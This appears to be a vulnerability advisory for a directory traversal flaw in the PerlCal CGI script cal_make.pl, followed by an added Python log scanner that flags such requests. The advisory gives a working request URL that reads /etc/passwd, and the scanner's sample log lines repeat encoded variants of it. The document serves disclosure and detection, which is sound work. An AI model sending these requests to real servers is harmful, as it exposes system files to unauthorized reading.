PerlCal Directory Traversal Vulnerability

http://www.example.com/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/passwd%00

This request displays the contents of /etc/passwd, provided the
web server user has read access to the file.

(courtesy Stan a.k.a. ThePike <stan@whizkunde.org>)
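
A log check for the request above, added here as an example and not part of the original advisory: it scans web access-log lines for requests to cal_make.pl whose p0 parameter decodes to a dot-dot path segment or a null byte. The sample log lines, the combined log format and the function names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/cal_make.pl?p0=../../../../etc/passwd%00 HTTP/1.0" 200 1432
192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/cal_make.pl?p0=team_calendar HTTP/1.0" 200 5120
192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/cal_make.pl?p0=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.0" 200 1432
192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /index.html HTTP/1.0" 200 300
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing (handles nested encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_p0(raw_value):
    """Return the reasons a raw p0 value matches the advisory's request pattern."""
    decoded = fully_decode(raw_value).replace("\\", "/")
    reasons = []
    if ".." in decoded.split("/"):
        reasons.append("dot-dot path segment")
    if "\x00" in decoded:
        reasons.append("null byte")
    return reasons

def scan(log_text, script="cal_make.pl"):
    """Return (client, status, reasons) for each suspicious request to the script."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/" + script):
            continue
        # Split the raw query by hand so the still-encoded value is inspected.
        for pair in parts.query.split("&"):
            name, _, raw = pair.partition("=")
            reasons = classify_p0(raw) if name == "p0" else []
            if reasons:
                findings.append((client, int(status), reasons))
    return findings
```

A flagged request that returned status 200 is the one to triage first, since the advisory notes the file is only shown when the web server user can read it.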

Copyright 2010, SecurityFocus